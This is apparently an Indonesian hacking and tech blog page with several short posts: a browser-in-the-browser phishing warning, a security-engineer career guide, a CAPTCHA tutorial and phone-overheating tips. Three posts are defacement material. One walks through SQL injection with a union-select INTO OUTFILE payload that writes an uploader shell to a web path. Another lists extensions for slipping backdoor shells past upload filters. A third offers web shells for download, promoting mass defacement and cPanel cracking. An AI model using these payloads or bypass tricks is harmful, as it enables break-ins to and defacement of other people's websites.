BITB (Browser in The Browser) Attack

Halo semuanya...

Bagaiman puasa kalian?? lancar?? ... Alhamdulillah kalo gitu....

Pernah ngga sih kalian login di suatu website dan ada tulisan login dengan google, facebook, dll. Nah ketika kita ngeklik biasanya kebuka window baru yang terhubung dengan situs tersebut, tapi apa jadinya kalau itu adalah phising?. Karna yang akan gua bahasa kali ini adalah tehnik BITB Attack, dimana kita bisa membuat sebuah popup yang menyerupai window yang seakan akan terbuka, namun itu hanya popup yang dirancang menyerupai window baru. 

Sampai disini pasti kalian bertanya tanya nih kan itu hanya popup bukan window baru keliatan dong? Yap pasti keliatan, itulah gunanya artikel ini. Untuk memastikan kalian tetap berhati hati jika menghubungkan akun di sebuah situs. Karna jika kalian hanya melihat url nya, di serangan kali ini bisa memanipulasi popup sehingga keliatan seperti window baru, jadi urlnya juga pasti dibuat buat.

Tehnik ini bisa dicampur dengan method Click Jacking yaitu mengiframe sebuah page phising dan juga bisa membuat page loginnya di popup tersebut tanpa harus menggunakan iframe. Jadi disini gua cuman memberikan sebuah peringatan bagi kalian yang suka ngeklik sesuatu tanpa liat liat, source dan juga detail dari halaman yang kalian klik

Nah bagi kalian yang ingin melihat example nya, bisa mengunjungi link dibawah...

https://github.com/mrd0x/BITB

Read More

Apa Itu Security Engineer?

Pernah ngga sih kalian mengakses suatu aplikasi yang menggunakan verifikasi email??, dan kalau kita login di perangkat lain maka akan ada email yang masuk tentang keamanan dan memastikan yang login itu adalah kamu. Nah itu adalah sebuah sistem security yang dirancang oleh Security Engineer suatu company, dan mereka juga berkewajiban untuk selalu memastikan bahwa data perusahaan tetap aman. Pasti kalian udah penasaran nih tentang skill apa aja yang harus dikuasai ketika ingin menjadi Security Engineer, disini gua akan jelasin dasarnyya dan kasi tips buat kalian yang berkeinginan untuk menjadi Security Engineer.

1. Paham Tentang Masalah Jaringan.

    Nah langkah awal untuk menjadi seorang Security Engineer adalah paham tentang jaringan serta resiko serangan ke jaringan, baik itu mungkin sebuah traffic atau mungkin ada yang ingin mengakses data company kamu hehehehe.. Karena data sekecil apapun jika bocor bisa menciptakan kerugian yang sangat besar untuk company itu sendiri oleh karena itu dibutuhkan tenaga ahli yang sangat paham di bidang jaringan yang dimana adalah sumber untuk mengakses data baik personal maupun company.

2. Mencagah dan Mengatasi Malware.

    

    Disamping masalah jaringan mereka juga harus bisa menganalisa semua jenis Malware dan melakukan pencegahan agar data data  dari company tersebut tetap aman. Tetapi jika ada yang sudah memasang malware maka tugas dari Security Enginer juga harus bisa mengatasi Malware tersebut. Untuk Malware akan saya jelasin di artikel selanjutnya yah...

3. Mengerti Bahasa Program

    Ini adalah bagian terpenting dari skill yang harus dimiliki seorang Security Enginer, karena meraka harus menganalisa program agar terhindar dari segala serangan berbahaya. Mungkin kalian bertanya tanya nih tentang bahasa program apa yang harus dipelajari?, tergantung company itu sendiri. Jika mereka memakai lebih dari satu bahasa pemerograman dalam sistem penyimpanan datanya, yah kaliah harus menguasai program tersebut hihihi..

4. Kemampuan Analisis dan Mitigasi Resiko

    Disamping semua itu sebenarnya kesimpulannya hanya ini hehehe,, tentang analisis dan resiko yang akan terjadi sehingga meminimalisir terjadinya kebocoran data.

5. Memahami Cloud Security

    Saat ini sangat banyak perusahaan yang memakasi cloud untuk tempat penyimpanan data sehingga memahami Cloud Security juga merupakan kewajiban jika kalian ingin menjadi seorang Security Enggineer

Tapi disamping itu semua jika kalian benar benar ingin menjadi seorang Security Engineer maka kalian harus banyak banyak belajar lagi baik itu di sekolah maupun di sekitar kita. Dan perlu kalian ingat bahwa Security Engineer itu juga biasanya terdiri dari beberapa orang, tergantung seberapa besar company itu sendiri. Jadi kalian juga harus bekerja sama jika kalian bekerja sebagai tim

Mungkin itu saja yang bisa gua tulis di artikel ini.. Jika bermanfaat jangan lupa ikuti blog ini yah hehehehe..

Read More

Cara Membuat Captcha (Completely Automated Public Turing test to tell Computers and Humans Apart) Dengan PHP Di Website

Halo perkenalkan nama gua arjun anjae. Jadi kali ini gua mau ngepost lagi yahh itung itung buat ngisi waktu biar gk bosen bosen amat. Nah sekarang gua mau bagiin nih cara menangkal bruteforce apalagi buat kalian programmer yang sering kebobol nih trus bingung tuh bugnya dimana setelah di searching ternyata di hacknya pake metod bruteforce wkwkwkwk. Sayang bangetkan apalagi kalian udah pusing pusing ngoding eh malah kena hack apalagi yang pakai native atau ngga yang lagi bangun cms nih ... gua saranin sih pake cara ini soalnya lebih simple trus aman dari serangan bruteforce tapi gak tau yang lain sih wkwkwkwkw...

Oke yang pertama caraya di kodingan elu, biasanya di proses login lu kasi tuh filter sebelum pembuatan session yaitu POST Captcha nih gua cantumin source codenya di github. Disitu udah full bahan pokoknya, dan juga gua udah buat video nih di youtube cara nya. jadi kalian tinggal nonton aja udah wkwkwkw. itu doang sih soalnya tutor fullnya ada di youtube trus bagi kalian yang cmn nyari source tinggal buka link github dibawah ....

Oh yah satu lagi tutor ini buat program PHP yah kalau maua konsultasi program lain chat aja wkwkwkw gua udah cantupin fanspage juga di blog ini... Enjoy pokoknya

Github Captcha

Klik Sini Udah

Oke Sekian Terima Gaji

Read More

deface poc SQL INTO OUTFILE

Hallo sobat cyber ,

Balik lagi sama gw Natalia or Vyolin serah mau panggil apa. Disini gw mau kasih tutor poc Into Outfile ya😆 

Kalian pasti tidak asing sama POC ini, oke langsung kita gasskeun aja...

Bahan-bahan :

-> Dork + path web 

Untuk dorknya kalian pake dork sqli aja ini untuk dapet pathnya harus hoki heheheh....

NOTE : Tidak selamanya yang keliaan path nya bisa di sql into out file yahh biasanya server windows..

-> Shell backdoor

-> Skill Sabar

Oke langsung ke tahap Ekse 

1.Pertama siapin web yang path webnya muncul sepeti ini ketika awal pentest sqli

Setelah itu kalian SQL seperti biasa

2.setelah kalian mendapatkan nomor togel 

Sepeti ini 

Lanjut di nomor togel kalian isi in " user() "

Nah kalau rada-rada vuln akan menampilkan tulisan root@localhost

(Gambar 3)

..

Selanjutnya kita kasih uploader di angka togel nya :

Ini uploader nya : https://pastebin.com/ekV0NcDY

Contoh :http://web.com/home=-2289%27+union+select+1,2,3,4, uploader nya,6,7,8,9,10 into outfile '/path web/nama shell.php'-- -

masih kurang paham?? coba liat ini....

Seperti itu pak..

5. Cara manggil uploader nya seperti ini : http://web.com/nama shell.php

NOTE : Sesuai tempat dir dari path nya yah

Nanti akan muncul uploader seperti ini :

Thanks : Arjun:*

Read More

HP Android Cepat Panas? Ini Penyebab dan Solusi Cara Mengatasinya

Mungkin sobat pernah bertanya, kenapa hp android cepat panas waktu dikantongi, bermain game, atau lainnya. Hal penting yang terkadang belum dimengerti orang adalah gejala panas pada smartphone itu hal yang wajar. Ini bukan disebabkan oleh jeleknya kualitas hp (meskipun hp murah cenderung begitu), namun oleh aktifitas kerja handphone itu sendiri. Bahkan hp mahal sekelas samsung galaxy S5 ataupun S6 misalnya, banyak juga pengguna yang mengeluhkan mengalami panas yang berlebih.

Smartphone Cepat Panas ini adalah perilaku normal, dan sesuatu yang terjadi pada hampir setiap ponsel, baik dengan sistem operasi Android, Iphone ataupun Windows. Panas ini berasal dari baterai ponsel sobat, yang biasanya memanas ketika sobat melakukan aktivitas terus menerus pada hp yang menyebabkan daya handphone digunakan lebih cepat dari biasanya. Seperti misalnya ketika sobat melakukan panggilan telepon, menggunakan GPS, menonton video, dan aktivitas lainnya.

Jika ponsel sobat begitu panas dan energi baterai turun secara drastis, itu berarti baterai rusak. Tapi jika tidak, masalah sobat hanyalah telepon yang panas dan tidak nyaman untuk digunakan. Dan jika baterai sobat panas, itu berarti baterai terkuras dengan cepat yang tidak normal dan itu akan berdampak buruk pada baterai.

Selain baterai, handphone cepat panas juga disebabkan oleh kerja cpu, ram, dan perangkat keras lainnya pada hp yang berat. Itulah yang menyebabkan hape dengan spesifikai rendah cenderung lebih gampang panas jika digunakan untuk mengerjakan aktivitas yang berat secara terus menerus.

Berikut adalah beberapa solusi untuk mengatasi hp yang cepat panas

1. Ganti Baterai

Sebagaimana yang telah dijelaskan, jika memang tenaga baterai sering turun drastis, mati mendadak, dan lainnya, bisa dipastikan baterai rusak itulah penyebabnya.

2. Jauhkan dari Panas

Ya, terkadang panas pada ponsel bukan bersumber dari ponsel itu sendiri, melainkan dari pengaruh luar. Seperti misalnya udara yang memang panas, menaruh di atas televisi, dekat oven, disamping kipas laptop yang mengeluarkan panas, dan lainnya. Solusinya tentu jauhkan hp sobat dari semua itu.

3. Jangan gunakan ketika sedang di-charge. 

Menggunakan hp saat dicharge sangat berpotensi menyebabkan hp cepat panas. Selain itu, menggunakan hp ketika dicas akan menyebabkan kerja baterai meningkat dan merusak baterai, seperti misalnya menggelembung, dan bahkan meledak.

4. Matikan aplikasi atau koneksi yang menguras baterai

Coba tutup semua aplikasi dengan benar, baik melalui task manager ataupun aplikasi pihak ketiga. Selain itu, matikan juga koneksi yang tidak diperlukan seperti misalnya bluetooth, wifi, GPS, infrared, dan koneksi lainnya. Juga pastikan sobat berada di lokasi yang mendapatkan sinyal dengan baik, karena hp yang bekerja terus menerus mencari sinyal juga menyebabkan panas.

Satu hal yang pasti juga adalah jangan gunakan lampu led sebagai senter dalam jangka waktu yang lama, ini tentu menguras baterai dan membuat hp cepat panas.

Aplikasi penghemat baterai seperti mislnya JuiceDefender pada android juga bisa dipertimbangkan untuk membantu masalah ini, atau dengan menutup semua aplikasi yang berjalan di iPhone. Intinya, sobat harus melakukan semua langkah yang membuat kinerja baterai lebih efisien.

5. Periksa Aplikasi yang terinstal

Kadang-kadang, ada aplikasi yang membuat CPU bekerja terus menerus meski tidak digunakan, atau ada juga yang ternyata berjalan tidak normal dari yang seharusnya. Ini tentu akan menyebabkan kerja baterai yang tidak normal dan akan menyebabkan panas.

Untuk mengatasinya, sobat bisa memantau kerja aplikasi melalui task manager bawaan android ataupun menggunakan aplikasi seperti misalnya Watchdog yang akan membantu sobat melacak gejala ini pada Android. Jadi kalau hp sobat cepat panas dan sobat tidak mengetahui penyebabnya, mungkin aplikasi tersebut bisa memberikan petunjuk.

6. Jangan "bekap" ponsel sobat

Pada beberapa kasus ditemukan bahwa penggunaan casing tambahan menyebabkan panas yang berlebih. Ini mungkin dikarenakan casing menjadi hambatan bagi ponsel untuk mencari sinyal. Selain casing, bisa jadi juga ketika ditaruh di dalam tas, kotak peyimpanan, ataupun lainnya. Untuk mengatasinya, cukup dengan buka casing tambahan atau taruh di tempat yang terbuka agar mendapat angin segar.

Aktivitas seperti menonton video ataupun menghidupkan GPS secara terus menerus sebagai penunjuk jalan pasti menimbulkan panas pada semua jenis smartphone. Untuk mengatasinya, sobat perlu menambahkan holder / pemegang smartphone agar tangan tidak memegang handphone terus menerus.

7. Jangan overclock ponsel

Overclocking ponsel adalah salah satu cara untuk meningkatkan kecepatan smartphone lebih dari kondisi standar, tapi itu akan menggunakan lebih banyak daya baterai dan panas tentu akan lebih cepat. Hanya gunakan SetCPU untuk underclock ponsel jika sobat mengalami masalah panas yang konstan.

8. Istirahatkan ponsel

• Ini semacam jalan terakhir namun juga yang termudah dan banyak dilakukan oleh pengguna ponsel. Uniknya, memang efektif meredam panas. Caranya adalah, matikan ponsel, lepas casing belakang handphone dan juga baterai. Tunggu sampai benar-benar dingin dan barulah dirakit kembali dan menghidupkannya lagi.

Read More

Shell Backdoor Ngga Bisa Kepasang?? Lakukan Ini

 

hai temen temen kali ini gua akan memberikan sebuah informasi tentang shell backdoor nah bagi kalian yang kesusahan untuk menanam shell backdoor kalian bisa menggunakan ext seperti berikut:

.jpg.PhP
.pjpeg
.php.;jpg
.fla
.jpg.p.jpeg.PhP
.phtml
.php5

nah segitu aja mungkin kalau mau lagi tinggal use your brain:V

ttd Mr.Ar

Read More

Download Shell Backdoor Terbaru 2019 Work 100%

    

 Hai teman teman kali ini gua ingin membagikan sebuah shell backdoor,,,, nah bagi kalian yang kesulitan mencari sebuah shell maka kalian bisa mendapatkannnya di sini dengan gratisssss....,, yap begitulah tapii,,, sebelum gua bagikan shell itu gua mau jelasin apa sih itu shell backdoor????.


      Shell backdoor itu adalah sebuah backdoor yang bisa ditanam di sebuah website bisa dibilang pintu belakang untuk memanipulasi admin dan kita bisa leluasa mengganti tampilan dari web tersebut.,, udah ah gua pusing jelasinnya jadi yang udah pengen download silahkan link ada di bawah.

    Di sini gua udah sediain 2 shell sekaligus, yang pertama adalah shell indoxploit v.3 nah kalau ini fiturnya lebih banyak gayn kita bisa melakukan symlink pada website yang telah ada shell ini dan yg kedua ini biasanya dipakai ketika ngga bisa upload file besar jadi kita gunain yang MINI SHELL ini gayn karna ukurannya lebih kecil. kebanyakan sih biasanya para defacer jika hanya ingin ngindex maka mereka hanya memakai MINI SHELL tapi kalau defacer itu ingin menggunakan fitur fitur luar biasa misalkan mass deface,symlink,crack cpanel,adminer,dll pokoknya lengkap gayn

   Udah ah gayn gua capek ngetik mendingan langsng aja nih

versi pertama

Shell Indoxploit V3

versi ke dua

Mini Shell

     Yap itu gayn silahkan comot and terimah kasih atas kedatangan kalian jika ada salah kata mohon dimaafkan dan jangan lupa follow blog ini dan visit setiap hari agar bisa membantu kami memberikan sebuah info tentang dunia teknologi 


sekian yah:V

Read More